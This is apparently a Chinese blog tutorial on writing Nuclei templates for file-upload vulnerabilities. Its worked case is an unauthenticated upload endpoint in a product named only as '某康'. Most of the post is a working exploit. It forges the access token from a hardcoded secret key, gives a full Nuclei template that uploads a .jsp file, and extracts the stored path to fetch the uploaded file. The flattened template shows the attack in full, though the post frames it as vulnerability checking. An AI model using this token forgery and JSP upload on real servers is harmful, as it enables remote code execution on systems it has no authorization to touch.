当前位置: 首页 > news >正文

Nuclei文件上传小Tips

news 来源:原创 2024/9/20 0:30:24

前言

Nuclei对于文件上传类型Poc编写小Tips

图片

平台

ProjectDiscovery Cloud Platform:
https://cloud.projectdiscovery.io/
JsonPath:
https://jsonpath.com/
Json解析:
在线json解析平台即可

案例

某康resourceOperations upload接口存在前台上传
具体接口:
POST /eps/api/resourceOperations/upload?token=xxx HTTP/1.1

分析

token为 32位MD5大写,即
MD5(https://target.com/eps/api/resourceOperations/uploadsecretKeyIbuilding)转大写

Resp返回path如下:

{"success":true,"message":"上传附件成功","data":{"uuid":null,"resourceUuid":"9abf316d58xxxxx25460b9358c91","resourceType":9998,"operationType":999,"extAttrs":"{\"fileName\":\"1.jsp\",\"fileSize\":\"0.00KB\"}","pUuid":null,"isOn":null,"resourceName":"1.jsp","resourceSize":"0.00KB","unitName":null,"regionName":null}}

完整path:https://target.com/eps/upload/resourceUuid值.jsp

Nuclei for Poc

variables:boundary: "{{rand_base(20)}}"Token: '{{to_upper("{{md5("https://{{Hostname}}/eps/api/resourceOperations/uploadsecretKeyIbuilding")}}")}}'

path提取

demo:

http:- raw:- |-POST /eps/api/resourceOperations/upload?token={{Token}} HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988Content-Type: multipart/form-data;boundary={{boundary}}Upgrade-Insecure-Requests: 1Content-Length: 174--{{boundary}}Content-Disposition: form-data; name="fileUploader";filename="1.jsp"Content-Type: image/jpeg123456--{{boundary}}- |-GET /eps/upload/{{plt}}.jsp HTTP/1.1Host: {{Hostname}}extractors:- type: jsonpart: bodyname: pltinternal: truejson: - '.data.resourceUuid'matchers-condition: andmatchers:- type: dsldsl:- contains_all(body_2,"123456") && status_code==200

更多网络安全优质免费学习资料与干货教程+

送渗透工具、技术文档、书籍,面试题、视频(基础到进阶。环境搭建,HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等)、应急响应笔记、学习路线。

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • ubuntu20 lightdm无法自动登录进入桌面
  • JVM -垃圾回收器
  • ceph如何增删改查的管理文件
  • PostgreSQL的pg_dump测试
  • 基于springboot的校园失物招领系统--论文pf
  • Nginx+Tomcat实现负载均衡、动静分离集群部署
  • 无人机随车飞行技术详解
  • 矩阵快速幂优化状态机dp,LeetCode 552. 学生出勤记录 II
  • redis学习笔记——redis中的常见数据类型以及相关命令
  • Java基础——IService.class 中查询数据方法list() 源码剖析及使用
  • 《区块链与监管合规:在创新与规范之间寻求平衡》
  • 基于ssm+vue+uniapp的二手物品交易平台小程序
  • Linux安装MQTT 服务器(图文教程)
  • Swift 基本语法
  • 【算法】dfs转dp的通用方式
  • .pyc 想到的一些问题
  • 【翻译】babel对TC39装饰器草案的实现
  • 8年软件测试工程师感悟——写给还在迷茫中的朋友
  • Computed property XXX was assigned to but it has no setter
  • Docker: 容器互访的三种方式
  • echarts的各种常用效果展示
  • Fabric架构演变之路
  • github从入门到放弃(1)
  • jquery ajax学习笔记
  • vue-loader 源码解析系列之 selector
  • 海量大数据大屏分析展示一步到位:DataWorks数据服务+MaxCompute Lightning对接DataV最佳实践...
  • 理解在java “”i=i++;”所发生的事情
  • 前端面试之CSS3新特性
  • 思否第一天
  • 微信开源mars源码分析1—上层samples分析
  • 一起来学SpringBoot | 第三篇:SpringBoot日志配置
  • JavaScript 新语法详解:Class 的私有属性与私有方法 ...
  • Semaphore
  • ​数据链路层——流量控制可靠传输机制 ​
  • ​总结MySQL 的一些知识点:MySQL 选择数据库​
  • # Swust 12th acm 邀请赛# [ K ] 三角形判定 [题解]
  • (补)B+树一些思想
  • (草履虫都可以看懂的)PyQt子窗口向主窗口传递参数,主窗口接收子窗口信号、参数。
  • (附源码)apringboot计算机专业大学生就业指南 毕业设计061355
  • (几何:六边形面积)编写程序,提示用户输入六边形的边长,然后显示它的面积。
  • (六)Flink 窗口计算
  • (一)80c52学习之旅-起始篇
  • (一)springboot2.7.6集成activit5.23.0之集成引擎
  • (一)十分简易快速 自己训练样本 opencv级联haar分类器 车牌识别
  • (转)GCC在C语言中内嵌汇编 asm __volatile__
  • (转)Linux下编译安装log4cxx
  • *Algs4-1.5.25随机网格的倍率测试-(未读懂题)
  • .ai域名是什么后缀?
  • .bat批处理(二):%0 %1——给批处理脚本传递参数
  • .gitignore文件忽略的内容不生效问题解决
  • .NET CORE Aws S3 使用
  • .Net Framework 4.x 程序到底运行在哪个 CLR 版本之上
  • .NET Standard 的管理策略
  • .net解析传过来的xml_DOM4J解析XML文件
  • .NET学习全景图